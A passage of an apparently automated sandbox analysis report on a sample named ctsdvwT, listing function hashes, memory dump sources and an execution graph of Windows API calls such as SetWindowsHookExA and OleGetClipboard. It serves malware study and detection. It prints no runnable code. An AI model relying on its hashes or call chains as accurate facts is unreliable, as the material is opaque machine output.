                                • Instruction Fuzzy Hash: E621C2755097808FCB07CF64D994715BFB1EB46214F28C1EAD8498F6A3C33A980ACB62
                                Function 05AF7E30 Relevance: .1, Instructions: 58COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f25a58325400133481ff877ddd61d05b3dddc06db440120a1045ae6828334a9
                                • Instruction ID: 26526e80e9a72f1f45190376374012abbd3f1e8ce2fbd3627da5f27c2a517a86
                                • Opcode Fuzzy Hash: 3f25a58325400133481ff877ddd61d05b3dddc06db440120a1045ae6828334a9
                                • Instruction Fuzzy Hash: 9A110A31F0021A8BCB58EBF9D9109EEBAB6BB89710B50447AD515E7240EF328D15CBA1
                                Function 05AFD688 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 846b45c079aa667063bbbdf0f5f27eeb9975bd7b401eaa3b92ee105a6b9a4757
                                • Instruction ID: 7ba8322057476b1709dbe8217bdebc09933650c36804091709b204879a9882ee
                                • Opcode Fuzzy Hash: 846b45c079aa667063bbbdf0f5f27eeb9975bd7b401eaa3b92ee105a6b9a4757
                                • Instruction Fuzzy Hash: 90213A70E10209DFDB44DFE9C545AAEBBF2FF48305F148469E519AB250DB309A40CF95
                                Function 05AFA944 Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f32bcc07b90a254db9d116c8bb8c6036931421b27c3f1f84e5d3653cdeb7f1e8
                                • Instruction ID: 592dc92b9465a924d66c6efd1188b07aa7b0c8cb4ae78d03a885392a49670caf
                                • Opcode Fuzzy Hash: f32bcc07b90a254db9d116c8bb8c6036931421b27c3f1f84e5d3653cdeb7f1e8
                                • Instruction Fuzzy Hash: 742114B580434D9FCB10CF9AC884BDEBBF4FB88320F148429E959A7200C374A954CFA5
                                Function 011DD3D3 Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1483979732.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11dd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction ID: 41050bd593ec72aa37f9940ce7e02a657212c4acf1bda98d9983e3bc71f36293
                                • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction Fuzzy Hash: AD11CD72404240DFCF16CF44D5C4B56BF61FB84324F2482A9D8090A657C33AE45ACBA2
                                Function 011DD4BF Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1483979732.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11dd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction ID: 2fce78b49231a5a872f88c3ce5036a8c2699f6d8275f45d38ec1add38526582f
                                • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction Fuzzy Hash: 4E119D76504280DFCF16CF54E5C4B16BF71FB84318F2486A9D8490B656C33AD45ACBA2
                                Function 011ED1CF Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1484050420.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11ed000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                • Instruction ID: 9fe5f525cc515f9c373a10d675c6fbdc8419cb04a5e1cd0d8f22561e8cf60740
                                • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                • Instruction Fuzzy Hash: 9111BB75504680DFCB06CF94D5C8B15FBA1FB84324F24C6A9D8494B696C33AD44ACB62
                                Function 05AF9F0C Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ea0a38a8078721113e6fa393bb6d57ddd1d6ee27448267775ebc28d77898bb61
                                • Instruction ID: 42a7af216ea4322694eb147e0573888e982c2f4b2ba47b76842a99b9f0751650
                                • Opcode Fuzzy Hash: ea0a38a8078721113e6fa393bb6d57ddd1d6ee27448267775ebc28d77898bb61
                                • Instruction Fuzzy Hash: 9111F5B5904648CFDB20DF9AC484BDEFBF4EB48310F148469E959A7240C379A944CFA5
                                Function 05AF70A0 Relevance: .0, Instructions: 28COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9214be2a109b69e4cab517695df699cd5e84ee2adf5a5d01ecfeb5a457e28fd4
                                • Instruction ID: 8418311fed6d3a97f6767dc3247ac679c0760eeca6c2b02b17f55e7e83716911
                                • Opcode Fuzzy Hash: 9214be2a109b69e4cab517695df699cd5e84ee2adf5a5d01ecfeb5a457e28fd4
                                • Instruction Fuzzy Hash: 5FF06D71D043899BCB15DFB8C8046ADBBB0AB05314F4086ECD990A7282DB325250DB91
                                Function 05AF70B0 Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 16761be50c4885f5353b8b4366c0d07cbaa23826c047350995cd9dd7b3e69587
                                • Instruction ID: c23494de5d348a6e6aae842d67f86da37cb12da07764f4369ee594dd4ce34eca
                                • Opcode Fuzzy Hash: 16761be50c4885f5353b8b4366c0d07cbaa23826c047350995cd9dd7b3e69587
                                • Instruction Fuzzy Hash: 75E0C2B4D00318AFCB44EFA8C9016AEBBB5FB08301F5086AED854A3340DB719651EB94
                                Function 05AFD748 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 153232b853ced126d53e3fea3187ead1f390a3d20c4b908d8c454f94b0e6deb1
                                • Instruction ID: c9a2822d61ce336628f4a9f236fd47954414288a5b7971c7ba8ea5fded154654
                                • Opcode Fuzzy Hash: 153232b853ced126d53e3fea3187ead1f390a3d20c4b908d8c454f94b0e6deb1
                                • Instruction Fuzzy Hash: 4AE09A74D102089FCB44DFA9D545A5CBBF4EF09611F0081EDD818D7750E6349940DF45
                                Function 05AFAE00 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15a949e7224143ec8c51621cc190bd6154cffcdc4eb7349b8953c1cf07673dd1
                                • Instruction ID: a0acb3bd1d593b902756202f5d310d0b93a01b2adfdae039dc5787d1f5d6907b
                                • Opcode Fuzzy Hash: 15a949e7224143ec8c51621cc190bd6154cffcdc4eb7349b8953c1cf07673dd1
                                • Instruction Fuzzy Hash: 4CE0E6B0D11309EFC704FFA4EA415AD7BB5FB44214710C569D805A7300DA376F109B95
                                Function 05AF7DFA Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 57f2e6dc1d2810c8f5ec090bcb52a66ff35022b4bc46e9d06ae3ece4919d6307
                                • Instruction ID: 25a19d743b15c7f046c9d312ddad3f4a34f91a13f358b0105c44d6ef38d4b7ae
                                • Opcode Fuzzy Hash: 57f2e6dc1d2810c8f5ec090bcb52a66ff35022b4bc46e9d06ae3ece4919d6307
                                • Instruction Fuzzy Hash: 90C04C370000105BDB01E68CC9A5FC6B7E6AF54714F849062E58486161E625D528AB45
                                Function 05AFF558 Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7280e565f2d2f06a8478debb1722ccb440bb4a9a010bfa2345a362ab0bfe0351
                                • Instruction ID: f41dee5b15f7b006efeedd0a812611bf6ae36b07a3812e4aa2405fff7de3077a
                                • Opcode Fuzzy Hash: 7280e565f2d2f06a8478debb1722ccb440bb4a9a010bfa2345a362ab0bfe0351
                                • Instruction Fuzzy Hash: 1EC08C30040704CFC3046BF4BA0E764766A7B02202F042115F22E41420DBF00010C729
                                Function 05AF553C Relevance: .0, Instructions: 9COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 372042f4d1f10ff79e1df4028beb1b9e24a1b61416f96bbc52cb204033ab760a
                                • Instruction ID: 326a07d632f3e96d0b5f20d83b767c1e6823a4ddda710cc7083e42696e40de87
                                • Opcode Fuzzy Hash: 372042f4d1f10ff79e1df4028beb1b9e24a1b61416f96bbc52cb204033ab760a
                                • Instruction Fuzzy Hash: A8C04C361441009B8A02E7D4C594D2977A2FF993007409866764545021DA218928EB56
                                Function 05AFA90C Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c39a327594e4186c56d63ac0edd4abda0eafdaf3957453e644ff827f76cec772
                                • Instruction ID: 7cede228494334d0487dde92ba2836c3e4171249cf127f644eb69fd81db6b8c8
                                • Opcode Fuzzy Hash: c39a327594e4186c56d63ac0edd4abda0eafdaf3957453e644ff827f76cec772
                                • Instruction Fuzzy Hash: 43B09235659341A39501A2E54999E2A5226ABA9705B41CC29370E4000098258834A21F

                                Execution Graph

                                Execution Coverage:12.2%
                                Dynamic/Decrypted Code Coverage:92.7%
                                Signature Coverage:0%
                                Total number of Nodes:179
                                Total number of Limit Nodes:20
                                execution_graph 28716 5e1e120 28717 5e1e12b 28716->28717 28719 5e1e13b 28717->28719 28720 5e1db90 28717->28720 28721 5e1e170 OleInitialize 28720->28721 28722 5e1e1d4 28721->28722 28722->28719 28723 5e1fe08 28724 5e1fe4c SetWindowsHookExA 28723->28724 28726 5e1fe92 28724->28726 28853 5e1c6d8 DuplicateHandle 28854 5e1c76e 28853->28854 28855 5e18978 28856 5e189e0 CreateWindowExW 28855->28856 28858 5e18a9c 28856->28858 28727 5e178ca 28728 5e178d0 GetModuleHandleW 28727->28728 28730 5e17945 28728->28730 28731 f1d01c 28733 f1d034 28731->28733 28732 f1d08e 28733->28732 28738 5e18b22 28733->28738 28742 5e18b30 28733->28742 28746 5e1d2b1 28733->28746 28754 5e16c24 28733->28754 28739 5e18b30 28738->28739 28740 5e16c24 2 API calls 28739->28740 28741 5e18b77 28740->28741 28741->28732 28743 5e18b56 28742->28743 28744 5e16c24 2 API calls 28743->28744 28745 5e18b77 28744->28745 28745->28732 28749 5e1d2ba 28746->28749 28747 5e1d341 28774 5e1c28c 28747->28774 28749->28747 28750 5e1d331 28749->28750 28762 5e1d468 28750->28762 28768 5e1d458 28750->28768 28751 5e1d33f 28757 5e16c2f 28754->28757 28755 5e1d341 28756 5e1c28c 2 API calls 28755->28756 28759 5e1d33f 28756->28759 28757->28755 28758 5e1d331 28757->28758 28760 5e1d468 2 API calls 28758->28760 28761 5e1d458 2 API calls 28758->28761 28760->28759 28761->28759 28764 5e1d476 28762->28764 28763 5e1c28c 2 API calls 28763->28764 28764->28763 28765 5e1d552 28764->28765 28781 5e1d948 28764->28781 28786 5e1d939 28764->28786 28765->28751 28770 5e1d45c 28768->28770 28769 5e1c28c 2 API calls 28769->28770 28770->28769 28771 5e1d552 28770->28771 28772 5e1d939 OleGetClipboard 28770->28772 28773 5e1d948 OleGetClipboard 28770->28773 28771->28751 28772->28770 28773->28770 28775 5e1c291 28774->28775 28776 5e1d654 28775->28776 28777 5e1d5aa 28775->28777 28778 5e16c24 OleGetClipboard 28776->28778 28779 5e1d602 CallWindowProcW 28777->28779 28780 5e1d5b1 28777->28780 28778->28780 28779->28780 28780->28751 28782 5e1d949 28781->28782 28783 5e1d9ee 28782->28783 28791 5e1df00 28782->28791 28798 5e1debf 28782->28798 28783->28764 28787 5e1d93c 28786->28787 28788 5e1d9ee 28787->28788 28789 5e1df00 OleGetClipboard 28787->28789 28790 5e1debf OleGetClipboard 28787->28790 28788->28764 28789->28787 28790->28787 28792 5e1df08 28791->28792 28793 5e1df1c 28792->28793 28797 5e1debf OleGetClipboard 28792->28797 28817 5e1df48 28792->28817 28829 5e1df38 28792->28829 28793->28782 28794 5e1df31 28794->28782 28797->28794 28799 5e1decc 28798->28799 28800 5e1df37 28799->28800 28804 5e1deda 28799->28804 28802 5e1df75 28800->28802 28806 5e1dfb9 28800->28806 28801 5e1df1c 28801->28782 28814 5e1df48 OleGetClipboard 28802->28814 28815 5e1df38 OleGetClipboard 28802->28815 28816 5e1debf OleGetClipboard 28802->28816 28803 5e1df7b 28803->28782 28804->28801 28809 5e1df48 OleGetClipboard 28804->28809 28810 5e1df38 OleGetClipboard 28804->28810 28811 5e1debf OleGetClipboard 28804->28811 28805 5e1df31 28805->28782 28808 5e1e039 28806->28808 28812 5e1e200 OleGetClipboard 28806->28812 28813 5e1e210 OleGetClipboard 28806->28813 28807 5e1e057 28807->28782 28808->28782 28809->28805 28810->28805 28811->28805 28812->28807 28813->28807 28814->28803 28815->28803 28816->28803 28818 5e1df4d 28817->28818 28819 5e1df75 28818->28819 28826 5e1dfb9 28818->28826 28823 5e1df48 OleGetClipboard 28819->28823 28824 5e1df38 OleGetClipboard 28819->28824 28825 5e1debf OleGetClipboard 28819->28825 28820 5e1df7b 28820->28794 28821 5e1e057 28821->28794 28822 5e1e039 28822->28794 28823->28820 28824->28820 28825->28820 28826->28822 28841 5e1e200 28826->28841 28845 5e1e210 28826->28845 28830 5e1df48 28829->28830 28831 5e1df75 28830->28831 28833 5e1dfb9 28830->28833 28836 5e1df48 OleGetClipboard 28831->28836 28837 5e1df38 OleGetClipboard 28831->28837 28838 5e1debf OleGetClipboard 28831->28838 28832 5e1df7b 28832->28794 28835 5e1e039 28833->28835 28839 5e1e200 OleGetClipboard 28833->28839 28840 5e1e210 OleGetClipboard 28833->28840 28834 5e1e057 28834->28794 28835->28794 28836->28832 28837->28832 28838->28832 28839->28834 28840->28834 28843 5e1e210 28841->28843 28844 5e1e24b 28843->28844 28849 5e1dca8 28843->28849 28844->28821 28847 5e1e225 28845->28847 28846 5e1dca8 OleGetClipboard 28846->28847 28847->28846 28848 5e1e24b 28847->28848 28848->28821 28850 5e1e2b8 OleGetClipboard 28849->28850 28852 5e1e352 28850->28852 28859 f60848 28861 f6084e 28859->28861 28860 f6091b 28861->28860 28863 f61380 28861->28863 28864 f61396 28863->28864 28865 f61498 28864->28865 28868 5e158e0 28864->28868 28874 5e158cb 28864->28874 28865->28861 28870 5e158f2 28868->28870 28869 5e159a3 28869->28864 28870->28869 28880 5e103a4 28870->28880 28872 5e15969 28885 5e103c4 28872->28885 28876 5e158f2 28874->28876 28875 5e159a3 28875->28864 28876->28875 28877 5e103a4 GetModuleHandleW 28876->28877 28878 5e15969 28877->28878 28879 5e103c4 KiUserCallbackDispatcher 28878->28879 28879->28875 28881 5e103af 28880->28881 28889 5e16e91 28881->28889 28895 5e16ea0 28881->28895 28882 5e15f4a 28882->28872 28886 5e103cf 28885->28886 28888 5e1d893 28886->28888 28926 5e1c2e4 28886->28926 28888->28869 28890 5e16ea0 28889->28890 28901 5e173f0 28890->28901 28891 5e16f4e 28892 5e15e3c GetModuleHandleW 28891->28892 28893 5e16f7a 28891->28893 28892->28893 28896 5e16ecb 28895->28896 28900 5e173f0 GetModuleHandleW 28896->28900 28897 5e16f4e 28898 5e15e3c GetModuleHandleW 28897->28898 28899 5e16f7a 28897->28899 28898->28899 28900->28897 28902 5e1744d 28901->28902 28903 5e174ce 28902->28903 28906 5e17683 28902->28906 28914 5e175ef 28902->28914 28907 5e176af 28906->28907 28922 5e15e3c 28907->28922 28909 5e1771a 28910 5e15e3c GetModuleHandleW 28909->28910 28913 5e17794 28909->28913 28911 5e17768 28910->28911 28912 5e15e3c GetModuleHandleW 28911->28912 28911->28913 28912->28913 28913->28903 28915 5e175fa 28914->28915 28916 5e15e3c GetModuleHandleW 28915->28916 28917 5e1771a 28916->28917 28918 5e15e3c GetModuleHandleW 28917->28918 28921 5e17794 28917->28921 28919 5e17768 28918->28919 28920 5e15e3c GetModuleHandleW 28919->28920 28919->28921 28920->28921 28921->28903 28923 5e178d0 GetModuleHandleW 28922->28923 28925 5e17945 28923->28925 28925->28909 28927 5e1c2e9 KiUserCallbackDispatcher 28926->28927 28929 5e1d916 28927->28929 28929->28886

                                Executed Functions

                                Function 00F69638 Relevance: 2.8, Instructions: 2822COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2dd41ac5e9d32c5fbd10c57fa0a1e6ad36541277ffbea6223a78d4e76d8c2a91
                                • Instruction ID: 4eb9a9afdc7942666f4d85380e38e6f86ff9bdda8c0aaad1322c0fc4734463b9
                                • Opcode Fuzzy Hash: 2dd41ac5e9d32c5fbd10c57fa0a1e6ad36541277ffbea6223a78d4e76d8c2a91
                                • Instruction Fuzzy Hash: BC53F831D10B1A8ACB51EF68C8805A9F7B1FF99310F15D79AE4587B121FB70AAD4CB81
                                Function 00F6C8C0 Relevance: 2.3, Instructions: 2311COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ad7565ec42ebc1cc4310b5bcae344a36b4eb8bfb496d30b9513ca734f9e2c8b5
                                • Instruction ID: df34dfd5e364697487e3a38c268a59724c5bd6a7461b6552cdf1af18c2e67d45
                                • Opcode Fuzzy Hash: ad7565ec42ebc1cc4310b5bcae344a36b4eb8bfb496d30b9513ca734f9e2c8b5
                                • Instruction Fuzzy Hash: 19333F31D10B198EDB11EF68C8846ADF7B1FF99300F15C79AE459A7211EB70AAC5CB81
                                Function 00F63E98 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek
                                • API String ID: 0-172235318
                                • Opcode ID: 43825d001067599e8bc38e491b1483ca7ae6a380cc612a17176f79bff39012b2
                                • Instruction ID: 6f64dda1f0efbfce0a021086df4d4e8c9dd2f50368ac46f826a3038ac5c2f2d0
                                • Opcode Fuzzy Hash: 43825d001067599e8bc38e491b1483ca7ae6a380cc612a17176f79bff39012b2
                                • Instruction Fuzzy Hash: A091AD70E00309DFDF14DFA9D8817DEBBF2AF89714F248129E414AB294DB749885DB91
                                Function 00F64AB0 Relevance: .3, Instructions: 266COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 37f8b9aad96185942f5c3c26fd567ee31eb44c8d8e897c018f1b2584a885aa5d
                                • Instruction ID: 354ae754f607ac93f123127388ba2bb7645553d0adcf90c0938f6ca306f9e6df
                                • Opcode Fuzzy Hash: 37f8b9aad96185942f5c3c26fd567ee31eb44c8d8e897c018f1b2584a885aa5d
                                • Instruction Fuzzy Hash: 31B16D70E00209CFDF10DFA9D88579EBBF2AF88714F148529D815E7394EB74A885EB91
                                Function 00F64828 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 570 f64828-f648b4 573 f648b6-f648c1 570->573 574 f648fe-f64900 570->574 573->574 575 f648c3-f648cf 573->575 576 f64902-f6491a 574->576 577 f648f2-f648fc 575->577 578 f648d1-f648db 575->578 583 f64964-f64966 576->583 584 f6491c-f64927 576->584 577->576 579 f648df-f648ee 578->579 580 f648dd 578->580 579->579 582 f648f0 579->582 580->579 582->577 585 f64968-f649ad 583->585 584->583 586 f64929-f64935 584->586 594 f649b3-f649c1 585->594 587 f64937-f64941 586->587 588 f64958-f64962 586->588 589 f64945-f64954 587->589 590 f64943 587->590 588->585 589->589 592 f64956 589->592 590->589 592->588 595 f649c3-f649c9 594->595 596 f649ca-f64a27 594->596 595->596 603 f64a37-f64a3b 596->603 604 f64a29-f64a2d 596->604 606 f64a3d-f64a41 603->606 607 f64a4b-f64a4f 603->607 604->603 605 f64a2f-f64a32 call f60ab8 604->605 605->603 606->607 611 f64a43-f64a46 call f60ab8 606->611 608 f64a51-f64a55 607->608 609 f64a5f-f64a63 607->609 608->609 613 f64a57 608->613 614 f64a65-f64a69 609->614 615 f64a73 609->615 611->607 613->609 614->615 616 f64a6b 614->616 617 f64a74 615->617 616->615 617->617
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek$\Vek
                                • API String ID: 0-1171950776
                                • Opcode ID: 8c976366553f8f094c41fdbb6a5b0377e0f993cfdeede58a6cc80d436d340522
                                • Instruction ID: 0f4b2c86ebe2d74af86534e7c0a835fc05b6eef7c29191d329c57250d98d8671
                                • Opcode Fuzzy Hash: 8c976366553f8f094c41fdbb6a5b0377e0f993cfdeede58a6cc80d436d340522
                                • Instruction Fuzzy Hash: 73717BB0E00349DFDF14EFA9C88579EBBF2AF88714F148129E414A7294DB78A841DF95
                                Function 00F6481C Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 522 f6481c-f648b4 525 f648b6-f648c1 522->525 526 f648fe-f64900 522->526 525->526 527 f648c3-f648cf 525->527 528 f64902-f6491a 526->528 529 f648f2-f648fc 527->529 530 f648d1-f648db 527->530 535 f64964-f64966 528->535 536 f6491c-f64927 528->536 529->528 531 f648df-f648ee 530->531 532 f648dd 530->532 531->531 534 f648f0 531->534 532->531 534->529 537 f64968-f6497a 535->537 536->535 538 f64929-f64935 536->538 545 f64981-f649ad 537->545 539 f64937-f64941 538->539 540 f64958-f64962 538->540 541 f64945-f64954 539->541 542 f64943 539->542 540->537 541->541 544 f64956 541->544 542->541 544->540 546 f649b3-f649c1 545->546 547 f649c3-f649c9 546->547 548 f649ca-f64a27 546->548 547->548 555 f64a37-f64a3b 548->555 556 f64a29-f64a2d 548->556 558 f64a3d-f64a41 555->558 559 f64a4b-f64a4f 555->559 556->555 557 f64a2f-f64a32 call f60ab8 556->557 557->555 558->559 563 f64a43-f64a46 call f60ab8 558->563 560 f64a51-f64a55 559->560 561 f64a5f-f64a63 559->561 560->561 565 f64a57 560->565 566 f64a65-f64a69 561->566 567 f64a73 561->567 563->559 565->561 566->567 568 f64a6b 566->568 569 f64a74 567->569 568->567 569->569
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek$\Vek
                                • API String ID: 0-1171950776
                                • Opcode ID: d779f8234917e5e6634a5d048259ba87cdd9f46a767312b0d8a1392ab6b11720
                                • Instruction ID: f4f9f79f3627a50cdef8a517a74e4a340633d1c4f9354c1a306d36e5ab15d0ea
                                • Opcode Fuzzy Hash: d779f8234917e5e6634a5d048259ba87cdd9f46a767312b0d8a1392ab6b11720
                                • Instruction Fuzzy Hash: CC7189B0E00349DFDF10EFA8C8857DEBBF2AF89714F148129E414AB254DB78A841DB95
                                Function 05E1896E Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1057 5e1896e-5e189de 1059 5e189e0-5e189e6 1057->1059 1060 5e189e9-5e189f0 1057->1060 1059->1060 1061 5e189f2-5e189f8 1060->1061 1062 5e189fb-5e18a33 1060->1062 1061->1062 1063 5e18a3b-5e18a9a CreateWindowExW 1062->1063 1064 5e18aa3-5e18adb 1063->1064 1065 5e18a9c-5e18aa2 1063->1065 1069 5e18ae8 1064->1069 1070 5e18add-5e18ae0 1064->1070 1065->1064 1071 5e18ae9 1069->1071 1070->1069 1071->1071
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E18A8A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 36d583c1058c80909ceab8f1a7f1bdb2c50a54ac7dd5d1167ad59f178c14da20
